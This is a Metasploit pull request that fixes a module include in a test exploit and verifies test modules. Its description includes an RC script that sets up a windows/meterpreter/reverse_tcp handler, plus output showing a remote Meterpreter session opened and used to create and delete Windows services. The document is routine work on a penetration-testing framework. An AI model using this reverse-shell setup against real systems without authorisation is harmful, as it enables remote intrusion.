### PR TITLE
Fix test modules

### DIFF
--- a/test/modules/exploits/test/cmdweb.rb
+++ b/test/modules/exploits/test/cmdweb.rb
@@ -10,7 +10,7 @@ class Metasploit3 < Msf::Exploit::Remote
   # =( need more targets and perhaps more OS specific return values OS specific would be preferred
 
   include Msf::Exploit::Remote::HttpClient
-  include Msf::Exploit::CmdStagerVBS
+  include Rex::Exploitation::CmdStagerVBS
 
   def initialize(info = {})
     super(update_info(info,


### PR DESCRIPTION
This fixes a couple of problems with some test modules. I'm sure there are more.
## Verification
- [x] First, make sure the modules actually load with no backtraces in your MSF logs

```
 $ ./msfconsole -qx "loadpath test/modules/; exit"
 Loaded 32 modules:
     12 auxiliarys
     12 exploits
     8 posts
```

The following RC script has 7 successful outputs when run against a reverse_tcp shell.
- [x] Run a reverse_tcp meterpreter payload with the following RC script to run the test against Windows

```
loadpath test/modules
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.43.1
run -j
sleep 5
use post/test/services
set SESSION 1
run
```
## Output

```
$ ./msfconsole -q -r test.rc
[*] Processing test.rc for ERB directives.
resource (test.rc)> loadpath test/modules
Loaded 32 modules:
    12 auxiliarys
    12 exploits
    8 posts
resource (test.rc)> use exploit/multi/handler
resource (test.rc)> set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
resource (test.rc)> set lhost 192.168.43.1
lhost => 192.168.43.1
resource (test.rc)> exploit -j
[*] Exploit running as background job.
resource (test.rc)> sleep 5
[*] Started reverse handler on 192.168.43.1:4444
[*] Starting the payload handler...
[*] Sending stage (787456 bytes) to 192.168.43.253
[*] Meterpreter session 1 opened (192.168.43.1:4444 -> 192.168.43.253:1057) at 2014-12-30 14:22:26 -0600
resource (test.rc)> use post/test/services
resource (test.rc)> set SESSION 1
SESSION => 1
resource (test.rc)> run
[*] Running against session 1
[*] Session type is meterpreter and platform is x86/win32
[+] should start W32Time
[+] should stop W32Time
[+] should list services
[+] should return info on a given service
[+] should create a service
[+] should return info on the newly-created service
[+] should delete the new service
[*] Passed: 7; Failed: 0
[*] Post module execution completed
```

Note: this test still doesn't run very reliably on Windows 8 64-bit unless you're
using the code from rapid7/meterpreter#107 and #4411, though it runs ok on
Windows XP SP3
